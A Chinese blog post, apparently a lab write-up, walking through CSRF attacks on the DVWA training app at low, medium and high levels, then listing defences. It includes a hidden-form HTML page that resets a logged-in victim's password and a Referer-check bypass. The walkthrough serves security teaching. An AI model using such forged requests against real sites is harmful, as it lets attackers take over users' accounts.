web安全之DVWAのCSRF(三)

安全
, ,

常见的FE三大漏洞. XSS/CSRF/SSRF. 可能之前的学习只是简单的写了个demo,并不深刻.

这里又查阅了一些资料总结, XSS目前直接存在的已经比较少了,CSRF是主流,而且XSS可以说是CSRF的一种. XSS是利用用户对某些网站的信任,而CSRF更隐蔽,利用网站对用户浏览器的信任.

而SSRF是针对服务器端的伪造请求攻击,就不是很相关了,之后再单独说,不要混为一谈了. SSRF并不是CSRF的儿子之类的.

0x00.回顾

CSRF(Cross-site request forgery)还是要举个例子, 这里还是上图把.比较简单形象. (诈骗信息

csrf10

核心词 跨站,请求,伪造 .CSR是被攻击用户操作的, F(伪造)是核心,攻击者实施.

  • 从受(害者)的角度来说,他是在已经登录的web站点上执行非本意的操作.
  • 从攻(击者)的角度来说,它需要欺骗浏览器,让其以受的名义执行hacker的欺骗操作.

这里把上次的Tamper Data安装发现成功了,虽然找半天没看到…..直接工具栏里面点开了.是一个三段式界面.

tamperdata00

不需要修改代理,它会直接抓包,但是缺点是会抓到一堆其他的东西.过滤器暂时不知道如何使用.就先直接分析包了.

0x01.实战

1.low level

右键当前的url–>replay in browser. 这里可以看到之前get提交的三个参数,其中密码是直接在url中存储的.那么也就是说,如果当前用户是登录状态,收到hacker发送的一个链接,其中只要包含了相关参数,就能直接起到修改效果.如图:

csrf11

这个url非常的暴力,加上非常的长,现在的00后也挺机智啦.这样他们是不会点的~ 所以是要包装一下的.

那么如何包装? 简单的办法就是构造html页面.把几个核心域隐藏起来,然后让用户去点击, 我给出代码

1
2
3
4
5
6
7
8
9
10
11
12
13
<html>
<head> 
<title>CSRF Attack</title> 
</head> 
  <body>
    <form action="http://localhost/dvwa/vulnerabilities/csrf/">
      <input type="hidden" name="password_new" value="hacker" />
      <input type="hidden" name="password_conf" value="hacker" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="MM图片" />
    </form>
  </body>
</html>

然后保存为csrf.html 丢在目录下. 嘿嘿,这样就伪造性大了很多.

csrf12

当然.这里我写的是一个button,其实还是有点主动,并不够隐蔽,其实现实攻击中,一般这执行的是一个自动的脚本.去提交请求. 而不是让用户去执行. 网页本身就可以放一些XX图片,用户看完就会关掉,很难察觉中了CSRF攻击.

2. medium level

下面换到第二个难度,发现第一个里面的cstf.html已经无效了提示请求不对. 看看代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = mysql_real_escape_string( $pass_new );
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }
    mysql_close();
}
?>
  • 发现eregi(str1,str2) 函数, 指str需要满足str1的要求. 这里加了reffer参数,需要满足server_name(localhost)包含.

验证一下理解对不对,那就改一下请求头的Reffer信息. 然后我们不知道源码的情况下应该先直接上完整的url,因为很多时候并不是server_name这种简单验证.

tamperdata01

首先,截断一下宝请求,注意截断跟抓取不是等同的. 截断会中断这个请求直到你修改确定好发送.

修改其中的reffer,发现请求修改密码成功了. 那么如果是这种比较普通的防御,我们怎么直接绕过呢?

比较取巧的办法就是新建一个 ip地址同名文件夹 比如localhost 那么访问的url就成了 http:ip/localhost/csrf.html

这样也会通过验证.因为eregi函数的原因. 当然我们不能指望正常人也使用这个函数….所以看看hard 难度

3.high level & impossible

又来啦. 又传了个user_token参数,每次随机生成. 想到之前第一次的爆破环节遇到的token. 但是这里并非直接爆破.所以并不能直接攻击.

这里需要网页还存在XSS漏洞,才能让我们获取页面的user_token参数.

impossible(确定是当前用户),现在大多数网站也都是这样做得,确保url是当前用户主动在操作.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_curr = $_GET[ 'password_current' ];
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Sanitise current password input
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = mysql_real_escape_string( $pass_curr );
    $pass_curr = md5( $pass_curr );

    // Check that the current password is correct
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
    $data->execute();

    // Do both new passwords match and does the current password match the user?
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
        // It does!
        $pass_new = stripslashes( $pass_new );
        $pass_new = mysql_real_escape_string( $pass_new );
        $pass_new = md5( $pass_new );

        // Update database with new password
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->execute();

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match or current password incorrect.</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();
?>

0x02.反思

  1. 同样是使用user_token参数去anti-csrf或者爆破,为什么爆破的地方可以直接突破,CSRF不能呢.

    本质想一下,爆破是主动的,是hacker主动去攻击,它可以截获主页上一个的响应包的参数. 而CSRF是被动的,等待其他用户去点击链接,那么怎么可能直接获取上一个的包呢?

  2. 防止CSRF的好办法.

    • 精准校验Referer
    • 随机Token (普遍做法,推荐使用)
    • 验证码 (粗暴,其实还是可以被绕过,影响用户体验)